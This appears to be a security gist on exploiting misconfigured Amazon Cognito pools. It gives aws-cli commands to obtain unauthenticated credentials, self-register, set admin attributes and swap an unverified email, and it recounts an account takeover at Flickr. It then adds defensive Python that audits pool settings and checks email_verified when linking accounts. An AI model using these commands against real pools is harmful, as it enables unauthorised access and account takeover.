@incogbyte
Created January 14, 2024 15:36
cognito exploitation
  1. Generate temporary AWS credentials using an unauthenticated user

     1.1 - Get the identity pool ID
     1.2 - Get an IdentityId for that pool with the following aws-cli command (example):

         $ aws cognito-identity get-id --identity-pool-id "us-east-1:f3400f4e-6a41-47db-834c-4af6d56e8359" --region "us-east-1"

     1.3 - Use the following command to get AWS credentials for the IdentityId returned by get-id:

         $ aws cognito-identity get-credentials-for-identity --identity-id "<IdentityId returned by get-id>" --region "us-east-1"

     1.4 - Enumerate what the returned temporary credentials are allowed to do:

         $ ./enumerate-iam.py --access-key <AccessKeyId> --secret-key <SecretKey> --session-token <SessionToken>

You can also try to fetch temporary AWS credentials as an authenticated user: after authenticating, try the commands below.

  2. Authentication bypass due to an enabled sign-up API (some apps do not intend to allow self sign-up). Use the following command to register a user:

         $ aws cognito-idp sign-up --client-id '3sci28ttu3qa49enh6alb4k2v3' --username 'jodson' --password 'Jodson@F00' --region 'us-east-1'

     2.1 - Confirm the account with the following command:

         $ aws cognito-idp confirm-sign-up --client-id <client-id> --username <email-address> --confirmation-code <confirmation-code> --region <region>

  3. Privilege escalation through writable user attributes

     3.1 - First fetch the user attributes:

         $ aws cognito-idp get-user --region <region> --access-token <access-token>

         Look for the following user attributes:
           - custom:isAdmin
           - custom:userRole
           - custom:isActive
           - custom:isApproved
           - custom:accessLevel

     3.2 - Update the user attributes:

         $ aws cognito-idp update-user-attributes --access-token <access-token> --region <region> --user-attributes Name="<attribute-name>",Value="<new-value>"

  4. Update the email attribute before verification (the email attribute value changes while the new address is still unverified)

         $ aws cognito-idp update-user-attributes --access-token <access-token> --region <region> --user-attributes Name="email",Value="<new-email>"

     Even with email verification enabled, most applications will update the email attribute value to the new, unverified email.
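Each of steps 1 to 4 above depends on a pool setting that can be read straight out of the Cognito configuration. The script below is an added example, not part of this gist, that audits the responses of `describe-identity-pool`, `describe-user-pool` and `describe-user-pool-client` for exactly those settings: unauthenticated identities, self sign-up, user-writable role attributes, email updates that take effect before verification, and case-sensitive usernames. The sample pool configurations embedded in it are constructed; the `fetch_live_config` helper and the assumption that an app client with no explicit `WriteAttributes` list can write every mutable attribute are mine.

```python
"""Audit Amazon Cognito settings for the misconfigurations used in steps 1-4.

Added example: it works on the plain dicts returned by the describe_* calls,
so the constructed samples at the bottom run offline without AWS access.
"""
from __future__ import annotations

# Custom attributes the gist says to look for; if writable, a user can grant themselves a role.
SENSITIVE_CUSTOM_ATTRS = {
    "custom:isAdmin", "custom:userRole", "custom:isActive",
    "custom:isApproved", "custom:accessLevel",
}


def audit_identity_pool(identity_pool: dict) -> list[str]:
    """Step 1: a pool that allows unauthenticated identities hands out STS
    credentials to anyone who knows the identity pool ID."""
    findings = []
    if identity_pool.get("AllowUnauthenticatedIdentities"):
        findings.append(
            "identity pool allows unauthenticated identities: get-id / "
            "get-credentials-for-identity work without a login; review the "
            "unauthenticated role's IAM policy"
        )
    return findings


def writable_attributes(user_pool: dict, app_client: dict | None) -> set[str]:
    """Attributes a user can change with update-user-attributes: mutable in the
    pool schema and, if the app client restricts writes, listed in WriteAttributes."""
    mutable = {a["Name"] for a in user_pool.get("SchemaAttributes", []) if a.get("Mutable")}
    client_writes = (app_client or {}).get("WriteAttributes")
    if client_writes:
        return mutable & set(client_writes)
    # Assumption: a client without an explicit WriteAttributes list can write all mutable attributes.
    return mutable


def audit_user_pool(user_pool: dict, app_client: dict | None = None) -> list[str]:
    """Steps 2-4: self sign-up, writable role attributes, unverified email updates."""
    findings = []

    # Step 2: AllowAdminCreateUserOnly=False means anyone can call sign-up.
    if not user_pool.get("AdminCreateUserConfig", {}).get("AllowAdminCreateUserOnly", False):
        findings.append("self sign-up is enabled (AllowAdminCreateUserOnly is false); confirm the app intends this")

    writable = writable_attributes(user_pool, app_client)

    # Step 3: role/approval flags the user can set on themselves.
    for name in sorted(writable & SENSITIVE_CUSTOM_ATTRS):
        findings.append(f"{name} is writable by the user via update-user-attributes")

    # Step 4: an email change takes effect before the new address is verified unless
    # AttributesRequireVerificationBeforeUpdate lists "email" (the console's
    # "keep original attribute value active when an update is pending").
    require_verify = set(
        user_pool.get("UserAttributeUpdateSettings", {}).get("AttributesRequireVerificationBeforeUpdate", [])
    )
    if "email" in writable and "email" not in require_verify:
        findings.append("email is writable and takes effect before verification (AttributesRequireVerificationBeforeUpdate lacks 'email')")

    # Case-sensitive usernames make Victim@example.com and victim@example.com two different users.
    if user_pool.get("UsernameConfiguration", {}).get("CaseSensitive") is True:
        findings.append("username/email sign-in is case-sensitive; addresses differing only in case are distinct users")

    return findings


def fetch_live_config(user_pool_id: str, app_client_id: str, identity_pool_id: str, region: str):
    """Optional: pull the real configuration with boto3 (needs AWS credentials).
    Imported lazily so the offline sample below runs without boto3 installed."""
    import boto3
    idp = boto3.client("cognito-idp", region_name=region)
    ident = boto3.client("cognito-identity", region_name=region)
    user_pool = idp.describe_user_pool(UserPoolId=user_pool_id)["UserPool"]
    client = idp.describe_user_pool_client(UserPoolId=user_pool_id, ClientId=app_client_id)["UserPoolClient"]
    identity_pool = ident.describe_identity_pool(IdentityPoolId=identity_pool_id)
    return user_pool, client, identity_pool


# Constructed sample configurations (not real pools): one with every weakness, one hardened.
WEAK_IDENTITY_POOL = {"AllowUnauthenticatedIdentities": True}
WEAK_USER_POOL = {
    "AdminCreateUserConfig": {"AllowAdminCreateUserOnly": False},
    "SchemaAttributes": [
        {"Name": "email", "Mutable": True},
        {"Name": "custom:isAdmin", "Mutable": True},
        {"Name": "custom:userRole", "Mutable": True},
    ],
    "UsernameConfiguration": {"CaseSensitive": True},
}
WEAK_APP_CLIENT = {"WriteAttributes": ["email", "custom:isAdmin", "custom:userRole"]}

HARDENED_IDENTITY_POOL = {"AllowUnauthenticatedIdentities": False}
HARDENED_USER_POOL = {
    "AdminCreateUserConfig": {"AllowAdminCreateUserOnly": True},
    "SchemaAttributes": [
        {"Name": "email", "Mutable": True},
        {"Name": "custom:isAdmin", "Mutable": False},
    ],
    "UserAttributeUpdateSettings": {"AttributesRequireVerificationBeforeUpdate": ["email"]},
    "UsernameConfiguration": {"CaseSensitive": False},
}
HARDENED_APP_CLIENT = {"WriteAttributes": ["email", "name"]}

if __name__ == "__main__":
    for label, ip, up, ac in (
        ("weak", WEAK_IDENTITY_POOL, WEAK_USER_POOL, WEAK_APP_CLIENT),
        ("hardened", HARDENED_IDENTITY_POOL, HARDENED_USER_POOL, HARDENED_APP_CLIENT),
    ):
        print(f"[{label}]")
        for f in audit_identity_pool(ip) + audit_user_pool(up, ac):
            print("  -", f)
```

Run it as-is to see the five findings the weak sample produces and the empty list for the hardened one; to audit a real pool, pass the three dicts returned by `fetch_live_config` to the same two functions. The custom attribute names are only a starting list; add whatever attributes your application reads as an authorization decision.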

Example:

  1. The victim's email is: [email protected]
  2. Updating the email through the application was not possible, but using the Cognito API the researcher managed to update their email to [email protected]
     Misconfigurations:
       - The email attribute is writable, so it is possible to update it via the Cognito API.
       - The email attribute is case-sensitive; this could have been set to case-insensitive from the AWS console.
  3. The attacker authenticates as [email protected]
     Misconfigurations:
       - The email_verified attribute value was not checked to be True.
       - "Keep original attribute value active when an update is pending" was not enabled.
  4. Flickr normalizes the [email protected] email to [email protected] (the victim), resulting in account takeover.
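The chain above breaks on the application side in two places: the email claim was trusted without checking email_verified, and case-normalization merged the attacker's address with the victim's account. The following is an added example, not Flickr's code and not part of this gist, of an account-resolution routine that keys on the Cognito `sub` claim, uses email to find an existing account only when `email_verified` is true, and still normalizes case for lookups without ever letting an unverified address reach that lookup. The in-memory account store and the token claims are constructed; verifying the ID token's signature, issuer and audience against the user pool's JWKS is assumed to have happened before the claims are passed in.

```python
"""Application-side account resolution for Cognito ID tokens.

Added example: demonstrates the two checks missing in the case above, using a
constructed in-memory store. Signature, iss and aud verification of the token
against the user pool's JWKS is assumed to have been done by the caller.
"""
from __future__ import annotations

from dataclasses import dataclass, field


def normalize_email(email: str) -> str:
    """Lookup key only: lower-case and trim. Only verified addresses are ever
    passed through it, so an unverified case variant cannot match anyone."""
    return email.strip().lower()


@dataclass
class Account:
    account_id: str
    email: str                      # address as the user registered it
    cognito_sub: str | None = None  # immutable identity key once linked


@dataclass
class AccountStore:
    accounts: list[Account] = field(default_factory=list)

    def by_sub(self, sub: str) -> Account | None:
        return next((a for a in self.accounts if a.cognito_sub == sub), None)

    def by_email(self, email: str) -> Account | None:
        key = normalize_email(email)
        return next((a for a in self.accounts if normalize_email(a.email) == key), None)

    def create(self, email: str, sub: str) -> Account:
        acct = Account(account_id=f"acct-{len(self.accounts) + 1}", email=email, cognito_sub=sub)
        self.accounts.append(acct)
        return acct


def resolve_login(claims: dict, store: AccountStore) -> tuple[str, str]:
    """Map already-verified ID-token claims to an application account.

    Returns (outcome, detail); outcome is "login", "linked", "created" or "rejected".
    """
    if claims.get("token_use") != "id":
        return "rejected", "not an ID token"
    sub = claims.get("sub")
    if not sub:
        return "rejected", "missing sub claim"

    # 1. The stable identity is sub, never the email.
    acct = store.by_sub(sub)
    if acct is not None:
        return "login", acct.account_id

    # 2. Email may locate an existing account only when Cognito reports it verified.
    #    A pending, unverified address (the update-before-verification case) stops here.
    email = claims.get("email")
    if not email or claims.get("email_verified") not in (True, "true"):
        return "rejected", "email not verified; refusing to link or create by email"

    existing = store.by_email(email)
    if existing is None:
        return "created", store.create(email, sub).account_id
    if existing.cognito_sub is None:
        existing.cognito_sub = sub  # first-time link of an account that predates Cognito
        return "linked", existing.account_id
    # 3. The address already belongs to a different Cognito identity (e.g. a case variant).
    return "rejected", "email already linked to another identity"


if __name__ == "__main__":
    store = AccountStore([Account("acct-1", "victim@example.com")])  # constructed
    # A Cognito user whose email was set to a case variant of the victim's but never verified.
    print(resolve_login({"token_use": "id", "sub": "attacker-sub",
                         "email": "Victim@Example.com", "email_verified": False}, store))
    # The real owner, whose address Cognito has verified.
    print(resolve_login({"token_use": "id", "sub": "victim-sub",
                         "email": "victim@example.com", "email_verified": True}, store))
```

The first call is rejected and the victim account stays unlinked; the second links it to the victim's `sub`, after which any later token carrying a case variant of the address, verified or not, is refused because the account is already bound to another identity. Keeping `sub` as the key means a later email change in Cognito, verified or pending, cannot move the account to a different user.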